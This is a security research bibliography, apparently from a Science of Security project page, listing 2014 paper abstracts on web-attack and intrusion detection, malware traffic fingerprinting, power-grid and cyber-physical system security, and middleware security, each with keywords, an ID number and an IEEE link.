  • Goseva-Popstojanova, Katerina; Dimitrijevikj, Ana, "Distinguishing between Web Attacks and Vulnerability Scans Based on Behavioral Characteristics," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.42,48, 13-16 May 2014. The number of vulnerabilities and reported attacks on Web systems are showing increasing trends, which clearly illustrate the need for better understanding of malicious cyber activities. In this paper we use clustering to classify attacker activities aimed at Web systems. The empirical analysis is based on four datasets, each in duration of several months, collected by high-interaction honey pots. The results show that behavioral clustering analysis can be used to distinguish between attack sessions and vulnerability scan sessions. However, the performance heavily depends on the dataset. Furthermore, the results show that attacks differ from vulnerability scans in a small number of features (i.e., session characteristics). Specifically, for each dataset, the best feature selection method (in terms of the high probability of detection and low probability of false alarm) selects only three features and results into three to four clusters, significantly improving the performance of clustering compared to the case when all features are used. The best subset of features and the extent of the improvement, however, also depend on the dataset.
    Keywords: Web applications; attacks; classification of malicious cyber activities; honeypots; vulnerability scans (ID#:14-2175)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844611&isnumber=6844560
  • Pajic, Miroslav; Weimer, James; Bezzo, Nicola; Tabuada, Paulo; Sokolsky, Oleg; Lee, Insup; Pappas, George J., "Robustness of Attack-Resilient State Estimators," Cyber-Physical Systems (ICCPS), 2014 ACM/IEEE International Conference on , vol., no., pp.163,174, 14-17 April 2014. The interaction between information technology and phys ical world makes Cyber-Physical Systems (CPS) vulnerable to malicious attacks beyond the standard cyber attacks. This has motivated the need for attack-resilient state estimation. Yet, the existing state-estimators are based on the non-realistic assumption that the exact system model is known. Consequently, in this work we present a method for state estimation in presence of attacks, for systems with noise and modeling errors. When the the estimated states are used by a state-based feedback controller, we show that the attacker cannot destabilize the system by exploiting the difference between the model used for the state estimation and the real physical dynamics of the system. Furthermore, we describe how implementation issues such as jitter, latency and synchronization errors can be mapped into parameters of the state estimation procedure that describe modeling errors, and provide a bound on the state-estimation error caused by modeling errors. This enables mapping control performance requirements into real-time (i.e., timing related) specifications imposed on the underlying platform. Finally, we illustrate and experimentally evaluate this approach on an unmanned ground vehicle case-study.
    Keywords: (not provided) (ID#:14-2176)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6843720&isnumber=6843703
  • Sanandaji, Borhan M.; Bitar, Eilyan; Poolla, Kameshwar; Vincent, Tyrone L., "An Abrupt Change Detection Heuristic With Applications To Cyber Data Attacks On Power Systems," American Control Conference (ACC), 2014 , vol., no., pp.5056,5061, 4-6 June 2014. We present an analysis of a heuristic for abrupt change detection of systems with bounded state variations. The proposed analysis is based on the Singular Value Decomposition (SVD) of a history matrix built from system observations. We show that monitoring the largest singular value of the history matrix can be used as a heuristic for detecting abrupt changes in the system outputs. We provide sufficient detectability conditions for the proposed heuristic. As an application, we consider detecting malicious cyber data attacks on power systems and test our proposed heuristic on the IEEE 39-bus testbed.
    Keywords: History; Monitoring; Noise level ;Power system dynamics; Time measurement; Vectors; Fault detection/accomodation; Power systems (ID#:14-2177)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6859403&isnumber=6858556
  • Farzan, F.; Jafari, M.A; Wei, D.; Lu, Y., "Cyber-related risk assessment and critical asset identification in power grids," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES , vol., no., pp.1,5, 19-22 Feb. 2014. This paper proposes a methodology to assess cyber-related risks and to identify critical assets both at power grid and substation levels. The methodology is based on a two-pass engine model. The first pass engine is developed to identify the most critical substation(s) in a power grid. A mixture of Analytical hierarchy process (AHP) and (N-1) contingent analysis is used to calculate risks. The second pass engine is developed to identify risky assets within a substation and improve the vulnerability of a substation against the intrusion and malicious acts of cyber hackers. The risk methodology uniquely combines asset reliability, vulnerability and costs of attack into a risk index. A methodology is also presented to improve the overall security of a substation by optimally placing security agent(s) on the automation system.
    Keywords: Automation ;Indexes; Modeling; Power grids; Reliability; Security; Substations; cyber security; cyber vulnerability; electrical power grids; risk assessment; substation (ID#:14-2178)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816371&isnumber=6816367
  • Tang, Lu-An; Han, Jiawei; Jiang, Guofei, "Mining sensor data in cyber-physical systems," Tsinghua Science and Technology , vol.19, no.3, pp.225,234, June 2014. A Cyber-Physical System (CPS) integrates physical devices (i.e., sensors) with cyber (i.e., informational) components to form a context sensitive system that responds intelligently to dynamic changes in real-world situations. Such a system has wide applications in the scenarios of traffic control, battlefield surveillance, environmental monitoring, and so on. A core element of CPS is the collection and assessment of information from noisy, dynamic, and uncertain physical environments integrated with many types of cyber-space resources. The potential of this integration is unbounded. To achieve this potential the raw data acquired from the physical world must be transformed into useable knowledge in real-time. Therefore, CPS brings a new dimension to knowledge discovery because of the emerging synergism of the physical and the cyber. The various properties of the physical world must be addressed in information management and knowledge discovery. This paper discusses the problems of mining sensor data in CPS: With a large number of wireless sensors deployed in a designated area, the task is real time detection of intruders that enter the area based on noisy sensor data. The framework of IntruMine is introduced to discover intruders from untrustworthy sensor data. IntruMine first analyzes the trustworthiness of sensor data, then detects the intruders' locations, and verifies the detections based on a graph model of the relationships between sensors and intruders.
    Keywords: cyber-physical system; data trustworthiness; sensor network (ID#:14-2179)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838193&isnumber=6838190
  • Hong, Junho; Liu, Chen-Ching; Govindarasu, Manimaran, "Detection of cyber intrusions using network-based multicast messages for substation automation," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES , vol., no., pp.1,5, 19-22 Feb. 2014. This paper proposes a new network-based cyber intrusion detection system (NIDS) using multicast messages in substation automation systems (SASs). The proposed network-based intrusion detection system monitors anomalies and malicious activities of multicast messages based on IEC 61850, e.g., Generic Object Oriented Substation Event (GOOSE) and Sampled Value (SV). NIDS detects anomalies and intrusions that violate predefined security rules using a specification-based algorithm. The performance test has been conducted for different cyber intrusion scenarios (e.g., packet modification, replay and denial-of-service attacks) using a cyber security testbed. The IEEE 39-bus system model has been used for testing of the proposed intrusion detection method for simultaneous cyber attacks. The false negative ratio (FNR) is the number of misclassified abnormal packets divided by the total number of abnormal packets. The results demonstrate that the proposed NIDS achieves a low fault negative rate.
    Keywords: Computer security; Educational institutions ;IEC standards; Intrusion detection; Substation automation; Cyber Security of Substations; GOOSE and SV; Intrusion Detection System; Network Security (ID#:14-2180)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816375&isnumber=6816367
  • Sumit, S.; Mitra, D.; Gupta, D., "Proposed Intrusion Detection on ZRP based MANET by effective k-means clustering method of data mining," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on , vol., no., pp.156,160, 6-8 Feb. 2014. Mobile Ad-Hoc Networks (MANET) consist of peer-to-peer infrastructure less communicating nodes that are highly dynamic. As a result, routing data becomes more challenging. Ultimately routing protocols for such networks face the challenges of random topology change, nature of the link (symmetric or asymmetric) and power requirement during data transmission. Under such circumstances both, proactive as well as reactive routing are usually inefficient. We consider, zone routing protocol (ZRP) that adds the qualities of the proactive (IARP) and reactive (IERP) protocols. In ZRP, an updated topological map of zone centered on each node, is maintained. Immediate routes are available inside each zone. In order to communicate outside a zone, a route discovery mechanism is employed. The local routing information of the zones helps in this route discovery procedure. In MANET security is always an issue. It is possible that a node can turn malicious and hamper the normal flow of packets in the MANET. In order to overcome such issue we have used a clustering technique to separate the nodes having intrusive behavior from normal behavior. We call this technique as effective k-means clustering which has been motivated from k-means. We propose to implement Intrusion Detection System on each node of the MANET which is using ZRP for packet flow. Then we will use effective k-means to separate the malicious nodes from the network. Thus, our Ad-Hoc network will be free from any malicious activity and normal flow of packets will be possible.
    Keywords: data mining; mobile ad hoc networks; mobile computing; peer-to-peer computing; routing protocols; telecommunication security; K-means clustering method; MANET security; ZRP based MANET; ad-hoc network; clustering technique; data mining; data transmission; intrusion detection system; intrusive behavior; k-means; local routing information; malicious activity; malicious nodes; mobile ad-hoc networks; packet flow; peer-to-peer infrastructure; proactive protocols; random topology; reactive protocols; route discovery mechanism; route discovery procedure; routing data; zone routing protocol; Flowcharts; Mobile ad hoc networks; Mobile computing; Protocols; Routing;I ARP; IDS effective k-means clustering; IERP; MANET ;ZRP (ID#:14-2181)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798303&isnumber=6798279
  • Boukhtouta, Amine; Lakhdari, Nour-Eddine; Debbabi, Mourad, "Inferring Malware Family through Application Protocol Sequences Signature," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2 2014. The dazzling emergence of cyber-threats exert today's cyberspace, which needs practical and efficient capabilities for malware traffic detection. In this paper, we propose an extension to an initial research effort, namely, towards fingerprinting malicious traffic by putting an emphasis on the attribution of maliciousness to malware families. The proposed technique in the previous work establishes a synergy between automatic dynamic analysis of malware and machine learning to fingerprint badness in network traffic. Machine learning algorithms are used with features that exploit only high-level properties of traffic packets (e.g. packet headers). Besides, the detection of malicious packets, we want to enhance fingerprinting capability with the identification of malware families responsible in the generation of malicious packets. The identification of the underlying malware family is derived from a sequence of application protocols, which is used as a signature to the family in question. Furthermore, our results show that our technique achieves promising malware family identification rate with low false positives.
    Keywords: (not provided) (ID#:14-2182)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814026&isnumber=6813963
  • Sayed, Bassam; Traore, Issa, "Protection against Web 2.0 Client-Side Web Attacks Using Information Flow Control," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.261,268, 13-16 May 2014. The dynamic nature of the Web 2.0 and the heavy obfuscation of web-based attacks complicate the job of the traditional protection systems such as Firewalls, Anti-virus solutions, and IDS systems. It has been witnessed that using ready-made toolkits, cyber-criminals can launch sophisticated attacks such as cross-site scripting (XSS), cross-site request forgery (CSRF) and botnets to name a few. In recent years, cyber-criminals have targeted legitimate websites and social networks to inject malicious scripts that compromise the security of the visitors of such websites. This involves performing actions using the victim browser without his/her permission. This poses the need to develop effective mechanisms for protecting against Web 2.0 attacks that mainly target the end-user. In this paper, we address the above challenges from information flow control perspective by developing a framework that restricts the flow of information on the client-side to legitimate channels. The proposed model tracks sensitive information flow and prevents information leakage from happening. The proposed model when applied to the context of client-side web-based attacks is expected to provide a more secure browsing environment for the end-user.
    Keywords: AJAX; Client-side web attacks ;Information Flow Control; Web 2.0 (ID#:14-2183)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844648&isnumber=6844560
  • Boukhtouta, Amine; Lakhdari, Nour-Eddine; Debbabi, Mourad, "Inferring Malware Family through Application Protocol Sequences Signature," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2, 2014. The dazzling emergence of cyber-threats exert today's cyberspace, which needs practical and efficient capabilities for malware traffic detection. In this paper, we propose an extension to an initial research effort, namely, towards fingerprinting malicious traffic by putting an emphasis on the attribution of maliciousness to malware families. The proposed technique in the previous work establishes a synergy between automatic dynamic analysis of malware and machine learning to fingerprint badness in network traffic. Machine learning algorithms are used with features that exploit only high-level properties of traffic packets (e.g. packet headers). Besides, the detection of malicious packets, we want to enhance fingerprinting capability with the identification of malware families responsible in the generation of malicious packets. The identification of the underlying malware family is derived from a sequence of application protocols, which is used as a signature to the family in question. Furthermore, our results show that our technique achieves promising malware family identification rate with low false positives.
    Keywords: (not provided) (ID#:14-2184)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814026&isnumber=6813963
  • Hong, J.; Liu, C.-C.; Govindarasu, M., "Integrated Anomaly Detection for Cyber Security of the Substations," Smart Grid, IEEE Transactions on , vol.5, no.4, pp.1643,1653, July 2014. Cyber intrusions to substations of a power grid are a source of vulnerability since most substations are unmanned and with limited protection of the physical security. In the worst case, simultaneous intrusions into multiple substations can lead to severe cascading events, causing catastrophic power outages. In this paper, an integrated Anomaly Detection System (ADS) is proposed which contains host- and network-based anomaly detection systems for the substations, and simultaneous anomaly detection for multiple substations. Potential scenarios of simultaneous intrusions into the substations have been simulated using a substation automation testbed. The host-based anomaly detection considers temporal anomalies in the substation facilities, e.g., user-interfaces, Intelligent Electronic Devices (IEDs) and circuit breakers. The malicious behaviors of substation automation based on multicast messages, e.g., Generic Object Oriented Substation Event (GOOSE) and Sampled Measured Value (SMV), are incorporated in the proposed network-based anomaly detection. The proposed simultaneous intrusion detection method is able to identify the same type of attacks at multiple substations and their locations. The result is a new integrated tool for detection and mitigation of cyber intrusions at a single substation or multiple substations of a power grid.
    Keywords: Circuit breakers; Computer security; Intrusion detection; Power grids; Substation automation; Anomaly detection; GOOSE anomaly detection; SMV anomaly detection and intrusion detection; cyber security of substations (ID#:14-2185)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786500&isnumber=6839066
  • Tsoutsos, N.G.; Maniatakos, M., "Fabrication Attacks: Zero-Overhead Malicious Modifications Enabling Modern Microprocessor Privilege Escalation," Emerging Topics in Computing, IEEE Transactions on , vol.2, no.1, pp.81,93, March 2014. The wide deployment of general purpose and embedded microprocessors has emphasized the need for defenses against cyber-attacks. Due to the globalized supply chain, however, there are several stages where a processor can be maliciously modified. The most promising stage, and the hardest during which to inject the hardware trojan, is the fabrication stage. As modern microprocessor chips are characterized by very dense, billion-transistor designs, such attacks must be very carefully crafted. In this paper, we demonstrate zero overhead malicious modifications on both high-performance and embedded microprocessors. These hardware trojans enable privilege escalation through execution of an instruction stream that excites the necessary conditions to make the modification appear. The minimal footprint, however, comes at the cost of a small window of attack opportunities. Experimental results show that malicious users can gain escalated privileges within a few million clock cycles. In addition, no system crashes were reported during normal operation, rendering the modifications transparent to the end user.
    Keywords: Computer architecture; Embedded systems; Fabrication; Hardware; logic gates; Microprocessors; Trojan horses; Hardware trojans; fabrication attacks; malicious modification; microprocessors; privilege escalation; zero overhead (ID#:14-2186)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6646239&isnumber=6824880
  • Pathan, AC.; Potey, M.A, "Detection of Malicious Transaction in Database Using Log Mining Approach," Electronic Systems, Signal Processing and Computing Technologies (ICESC), 2014 International Conference on , vol., no., pp.262,265, 9-11 Jan. 2014. Data mining is the process of finding correlations in the relational databases. There are different techniques for identifying malicious database transactions. Many existing approaches which profile is SQL query structures and database user activities to detect intrusion, the log mining approach is the automatic discovery for identifying anomalous database transactions. Mining of the Data is very helpful to end users for extracting useful business information from large database. Multi-level and multi-dimensional data mining are employed to discover data item dependency rules, data sequence rules, domain dependency rules, and domain sequence rules from the database log containing legitimate transactions. Database transactions that do not comply with the rules are identified as malicious transactions. The log mining approach can achieve desired true and false positive rates when the confidence and support are set up appropriately. The implemented system incrementally maintain the data dependency rule sets and optimize the performance of the intrusion detection process.
    Keywords: SQL; data mining; relational databases; security of data; SQL; anomalous database transactions; automatic discovery; data mining; data sequence rules; domain dependency rules; intrusion detection; log mining approach; malicious transaction detection; query database; query structures; relational databases; Computers; Data mining; Database systems; Intrusion detection; Training; Data Mining; Database security; Intrusion Detection (ID#:14-2187)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6745384&isnumber=6745317
  • Desai, N.N.; Diwanji, H.; Shah, J.S., "A temporal packet marking detection scheme against MIRA attack in MANET," Engineering and Computational Sciences (RAECS), 2014 Recent Advances in , vol., no., pp.1,5, 6-8 March 2014. Mobile Ad-hoc Network is highly susceptible towards the security attacks due to its dynamic topology, resource constraint, energy constraint operations, limited physical security and lack of infrastructure. Misleading routing attack (MIRA) in MANET intend to delay packet to its fullest in order to generate time outs at the source as packets will not reach in time. Its main objective is to generate delay and increase network overhead. It is a variation to the sinkhole attack. In this paper, we have proposed a detection scheme to detect the malicious nodes at route discovery as well as at packet transmissions. The simulation results of MIRA attack indicate that though delay is increased by 91.30% but throughput is not affected which indicates that misleading routing attack is difficult to detect. The proposed detection scheme when applied to misleading routing attack suggests a significant decrease in delay.
    Keywords: mobile ad hoc networks; packet radio networks ;telecommunication network routing; telecommunication network topology; telecommunication security; MANET; MIRA attack;delay packet; dynamic topology; energy constraint operations; malicious nodes detection; misleading routing attack; mobile ad-hoc network; packet marking detection scheme; packet transmission; physical security; resource constraint; Delays; IP networks; Mobile ad hoc networks; Routing; Security; Throughput; Topology; MANET; Misleading routing attack (MIRA);clustering; packet marking; time behavior (ID#:14-2188)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799560&isnumber=6799496
  • Bou-Harb, Elias; Debbabi, Mourad; Assi, Chadi, "Behavioral analytics for inferring large-scale orchestrated probing events," Computer Communications Workshops (INFOCOM WKSHPS), 2014 IEEE Conference on , vol., no., pp.506,511, April 27 2014-May 2 2014. The significant dependence on cyberspace has indeed brought new risks that often compromise, exploit and damage invaluable data and systems. Thus, the capability to proactively infer malicious activities is of paramount importance. In this context, inferring probing events, which are commonly the first stage of any cyber attack, render a promising tactic to achieve that task. We have been receiving for the past three years 12 GB of daily malicious real darknet data (i.e., Internet traffic destined to half a million routable yet unallocated IP addresses) from more than 12 countries. This paper exploits such data to propose a novel approach that aims at capturing the behavior of the probing sources in an attempt to infer their orchestration (i.e., coordination) pattern. The latter defines a recently discovered characteristic of a new phenomenon of probing events that could be ominously leveraged to cause drastic Internet-wide and enterprise impacts as precursors of various cyber attacks. To accomplish its goals, the proposed approach leverages various signal and statistical techniques, information theoretical metrics, fuzzy approaches with real malware traffic and data mining methods. The approach is validated through one use case that arguably proves that a previously analyzed orchestrated probing event from last year is indeed still active, yet operating in a stealthy, very low rate mode. We envision that the proposed approach that is tailored towards darknet data, which is frequently, abundantly and effectively used to generate cyber threat intelligence, could be used by network security analysts, emergency response teams and/or observers of cyber events to infer large-scale orchestrated probing events for early cyber attack warning and notification.
    Keywords: Conferences; IP networks; Internet; Malware; Probes (ID#:14-2189)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6849283&isnumber=6849127
  • Nitti, M.; Girau, R.; Atzori, L., "Trustworthiness Management in the Social Internet of Things," Knowledge and Data Engineering, IEEE Transactions on , vol.26, no.5, pp.1253,1266, May 2014. The integration of social networking concepts into the Internet of things has led to the Social Internet of Things (SIoT) paradigm, according to which objects are capable of establishing social relationships in an autonomous way with respect to their owners with the benefits of improving the network scalability in information/service discovery. Within this scenario, we focus on the problem of understanding how the information provided by members of the social IoT has to be processed so as to build a reliable system on the basis of the behavior of the objects. We define two models for trustworthiness management starting from the solutions proposed for P2P and social networks. In the subjective model each node computes the trustworthiness of its friends on the basis of its own experience and on the opinion of the friends in common with the potential service providers. In the objective model, the information about each node is distributed and stored making use of a distributed hash table structure so that any node can make use of the same information. Simulations show how the proposed models can effectively isolate almost any malicious nodes in the network at the expenses of an increase in the network traffic for feedback exchange.
    Keywords: Communication/Networking and Information Technology; Computer Systems Organization; Distributed Systems; General; Internet of things; social networks; trustworthiness management (ID#:14-2190)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547148&isnumber=6814899
  • Vegh, Laura; Miclea, Liviu, "Enhancing security in cyber-physical systems through cryptographic and steganographic techniques," Automation, Quality and Testing, Robotics, 2014 IEEE International Conference on , vol., no., pp.1,6, 22-24 May 2014. Information technology is continually changing, discoveries are made every other day. Cyber-physical systems consist of both physical and computational elements and are becoming more and more popular in today's society. They are complex systems, used in complex applications. Therefore, security is a critical and challenging aspect when developing cyber-physical systems. In this paper, we present a solution for ensuring data confidentiality and security by combining some of the most common methods in the area of security -- cryptography and steganography. Furthermore, we use hierarchical access to information to ensure confidentiality and also increase the overall security of the cyber-physical system.
    Keywords: cryptography; cyber-physical systems; hierarchical access; multi-agent systems; steganography (ID#:14-2191)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857845&isnumber=6857810

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Middleware Security

Middleware Security



Middleware facilitates distributed processing, and is of significant interest to the security world with the development of cloud and mobile applications. The articles listed here, presented and published in the first half of 2014, cover middleware used for healthcare, cyber-physical systems, and trust management.

  • Bruce, N.; Sain, M.; Hoon Jae Lee, "A Support Middleware Solution For E-Healthcare System Security," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.44,47, 16-19 Feb. 2014. doi: 10.1109/ICACT.2014.6778919 This paper presents a middleware solution to secure data and network in the e-healthcare system. The e-Healthcare Systems are a primary concern due to the easiest deployment area accessibility of the sensor devices. Furthermore, they are often interacting closely in cooperation with the physical environment and the surrounding people, where such exposure increases security vulnerabilities in cases of improperly managed security of the information sharing among different healthcare organizations. Hence, healthcare-specific security standards such as authentication, data integrity, system security and internet security are used to ensure security and privacy of patients' information. This paper discusses security threats on e-Healthcare Systems where an attacker can access both data and network using masquerade attack Moreover, an efficient and cost effective approach middleware solution is discussed for the delivery of secure services.
    Keywords: data privacy; health care; medical administrative data processing; middleware; security of data; Internet security; authentication; data integrity; e-health care system security; electronic health care; health care organizations; health care-specific security standards; information sharing; masquerade attack; patient information privacy; patient information security; security vulnerabilities; support middleware solution; system security; Authentication; Communication system security; Logic gates; Medical services; Middleware; Wireless sensor networks; Data Security; Middleware; Network Security; e-Healthcare (ID#:14-2192)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778919&isnumber=6778899
  • Kanewala, T.A; Marru, S.; Basney, J.; Pierce, M., "A Credential Store for Multi-tenant Science Gateways," Cluster, Cloud and Grid Computing (CCGrid), 2014 14th IEEE/ACM International Symposium on , vol., no., pp.445,454, 26-29 May 2014. doi: 10.1109/CCGrid.2014.95 Science Gateways bridge multiple computational grids and clouds, acting as overlay cyber infrastructure. Gateways have three logical tiers: a user interfacing tier, a resource tier and a bridging middleware tier. Different groups may operate these tiers. This introduces three security challenges. First, the gateway middleware must manage multiple types of credentials associated with different resource providers. Second, the separation of the user interface and middleware layers means that security credentials must be securely delegated from the user interface to the middleware. Third, the same middleware may serve multiple gateways, so the middleware must correctly isolate user credentials associated with different gateways. We examine each of these three scenarios, concentrating on the requirements and implementation of the middleware layer. We propose and investigate the use of a Credential Store to solve the three security challenges.
    Keywords: cloud computing; grid computing; middleware; user interfaces; clouds; computational grids; credential store; gateway middleware; middleware tier; multitenant science gateways; overlay cyber infrastructure; resource tier;user interfacing tier; Authentication; Communities; Logic gates; Middleware; Portals; Servers; Apache Airavata; Credential Store; OA4MP; Science Gateways; Security (ID#:14-2193)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6846480&isnumber=6846423
  • Al-Anzi, F.S.; Salman, AA; Jacob, N.K.; Soni, J., "Towards Robust, Scalable And Secure Network Storage In Cloud Computing," Digital Information and Communication Technology and it's Applications (DICTAP), 2014 Fourth International Conference on , pp.51,55, 6-8 May 2014. doi: 10.1109/DICTAP.2014.6821656 The term Cloud Computing is not something that appeared overnight, it may come from the time when computer system remotely accessed the applications and services. Cloud computing is Ubiquitous technology and receiving a huge attention in the scientific and industrial community. Cloud computing is ubiquitous, next generation's in-formation technology architecture which offers on-demand access to the network. It is dynamic, virtualized, scalable and pay per use model over internet. In a cloud computing environment, a cloud service provider offers "house of resources" includes applications, data, runtime, middleware, operating system, virtualization, servers, data storage and sharing and networking and tries to take up most of the overhead of client. Cloud computing offers lots of benefits, but the journey of the cloud is not very easy. It has several pitfalls along the road because most of the services are outsourced to third parties with added enough level of risk. Cloud computing is suffering from several issues and one of the most significant is Security, privacy, service availability, confidentiality, integrity, authentication, and compliance. Security is a shared responsibility of both client and service provider and we believe security must be information centric, adaptive, proactive and built in. Cloud computing and its security are emerging study area nowadays. In this paper, we are discussing about data security in cloud at the service provider end and proposing a network storage architecture of data which make sure availability, reliability, scalability and security.
    Keywords: cloud computing; data integrity; data privacy; security of data; storage management; ubiquitous computing; virtualization; Internet; adaptive security; authentication; built in security; client overhead; cloud computing environment; cloud service provider; compliance; confidentiality; data security; data sharing; data storage; information centric security; integrity; middleware; network storage architecture; networking; on-demand access; operating system; pay per use model; privacy; proactive security; remote application access ;remote service access; robust scalable secure network storage; server; service availability; service outsourcing; ubiquitous next generation information technology architecture; virtualization; Availability; Cloud computing; Computer architecture; Data security; Distributed databases; Servers; Cloud Computing; Data Storage; Data security; RAID (ID#:14-2194)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821656&isnumber=6821645
  • Xingbang Tian; Baohua Huang; Min Wu, "A Transparent Middleware For Encrypting Data in MongoDB," Electronics, Computer and Applications, 2014 IEEE Workshop on , vol., no., pp.906,909, 8-9 May 2014. doi: 10.1109/IWECA.2014.6845768 Due to the development of cloud computing and NoSQL database, more and more sensitive information are stored in NoSQL databases, which exposes quite a lot security vulnerabilities. This paper discusses security features of MongoDB database and proposes a transparent middleware implementation. The analysis of experiment results show that this transparent middleware can efficiently encrypt sensitive data specified by users on a dataset level. Existing application systems do not need too many modifications in order to apply this middleware.
    Keywords: cryptography; middleware; relational databases; MongoDB database; NoSQL database; cloud computing; dataset level; security vulnerability; sensitive data encryption; transparent middleware; Blogs; Cryptography; Educational institutions; Middleware; Database; Encrypting; MongoDB; NoSQL (ID#:14-2195)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845768&isnumber=6845536
  • Ochian, Adelina; Suciu, George; Fratu, Octavian; Voicu, Carmen; Suciu, Victor, "An Overview Of Cloud Middleware Services For Interconnection Of Healthcare Platforms," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866753 Using heterogeneous clouds has been considered to improve performance of big-data analytics for healthcare platforms. However, the problem of the delay when transferring big-data over the network needs to be addressed. The purpose of this paper is to analyze and compare existing cloud computing environments (PaaS, IaaS) in order to implement middleware services. Understanding the differences and similarities between cloud technologies will help in the interconnection of healthcare platforms. The paper provides a general overview of the techniques and interfaces for cloud computing middleware services, and proposes a cloud architecture for healthcare. Cloud middleware enables heterogeneous devices to act as data sources and to integrate data from other healthcare platforms, but specific APIs need to be developed. Furthermore, security and management problems need to be addressed, given the heterogeneous nature of the communication and computing environment. The present paper fills a gap in the electronic healthcare register literature by providing an overview of cloud computing middleware services and standardized interfaces for the integration with medical devices.
    Keywords: big data; cloud; healthcare; middleware; security; standards (ID#:14-2196)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866753&isnumber=6866648
  • Hoos, E., "Design method for developing a Mobile Engineering-Application Middleware (MEAM)," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on, vol., no., pp.176,177, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815193 Mobile Apps running on smartphones and tablet pes offer a new possibility to enhance the work of engineers because they provide an easy-to-use, touchscreen-based handling and can be used anytime and anywhere. Introducing mobile apps in the engineering domain is difficult because the IT environment is heterogeneous and engineering-specific challenges in the app development arise e. g., large amount of data and high security requirements. There is a need for an engineering-specific middleware to facilitate and standardize the app development. However, such a middleware does not yet exist as well as a holistic set of requirements for the development. Therefore, we propose a design method which offers a systematic procedure to develop Mobile Engineering-Application Middleware.
    Keywords: middleware; mobile computing; IT environment; MEAM; mobile engineering-application middleware; touchscreen-based handling; Business; Design methodology; Measurement; Middleware; Mobile communication; Security; Systematics; Design Method; Mobile Application; Mobile Engineering Application Middleware (ID#:14-2197)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815193&isnumber=6815123
  • Gang Han; Haibo Zeng; Yaping Li; Wenhua Dou, "SAFE: Security-Aware FlexRay Scheduling Engine," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,4, 24-28 March 2014. doi: 10.7873/DATE2014.021 In this paper, we propose SAFE (Security Aware FlexRay scheduling Engine), to provide a problem definition and a design framework for FlexRay static segment schedule to address the new challenge on security. From a high level specification of the application, the architecture and communication middleware are synthesized to satisfy security requirements, in addition to extensibility, costs, and end-to-end latencies. The proposed design process is applied to two industrial case studies consisting of a set of active safety functions and an X-by-wire system respectively.
    Keywords: automotive electronics; mobile radio; protocols; scheduling; telecommunication security ;FlexRay static segment schedule; SAFE;X-by-wire system; active safety functions; automotive domain; automotive electrical-electronic systems; communication middleware; communication protocol; end-to-end latencies; security-aware FlexRay scheduling engine; Authentication; Automotive engineering; Field programmable gate arrays; Protocols; Runtime; Safety (ID#:14-2198)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800222&isnumber=6800201
  • Oliveira Vasconcelos, R.; Nery e Silva, L.D.; Endler, M., "Towards efficient group management and communication for large-scale mobile applications," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on , vol., no., pp.551,556, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815266 Applications such as fleet management and logistics, emergency response, public security and surveillance or mobile workforce management use geo-positioning and mobile networks as means of enabling real-time monitoring, communication and collaboration among a possibly large set of mobile nodes. The majority of those systems require real-time tracking of mobile nodes (e.g. vehicles, people or mobile robots), reliable communication to/from the nodes, as well as group communication among the mobile nodes. In this paper we describe a distributed middleware with focus on management of context-defined groups of mobile nodes, and group communication with large sets of nodes. We also present a prototype Fleet Tracking and Management system based on our middleware, give an example of how context-specific group communication can enhance the node's mutual awareness, and show initial performance results that indicate small overhead and latency of the group communication and management.
